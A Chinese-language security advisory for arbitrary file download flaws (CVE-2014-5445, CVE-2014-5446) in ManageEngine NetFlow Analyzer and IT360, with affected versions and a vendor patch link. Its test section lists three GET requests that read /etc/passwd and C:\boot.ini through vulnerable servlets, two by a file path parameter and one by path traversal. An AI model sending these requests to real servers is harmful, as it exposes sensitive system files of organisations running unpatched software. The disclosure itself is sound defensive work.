发布日期：2014-12-01
更新日期：2015-02-11

受影响系统：

ManageEngine IT360 10.3
ManageEngine Netflow Analyzer 8.6-10.2

描述：

---

BUGTRAQ  ID: 71404
CVE(CAN) ID: CVE-2014-5446,CVE-2014-5445

ManageEngine是企业级IT管理软件，包括网络管理、服务器、桌面和应用管理。

ManageEngine NetFlow 8.6-10.2、ManageEngine IT360 10.3及更高版本存在多个任意文件下载漏洞，攻击者可利用这些漏洞下载任意文件并获取敏感信息。

<*来源：Pedro Ribeiro
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&amp;amp;pdf=true
GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini

建议：

---

厂商补丁：

ManageEngine
------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://support.zoho.com/portal/manageengine/helpcenter/articles/cve-2014-5445-cve-2014-5446-fix-for-arbitrary-file-download

浏览次数：2404
严重程度：0（网友投票）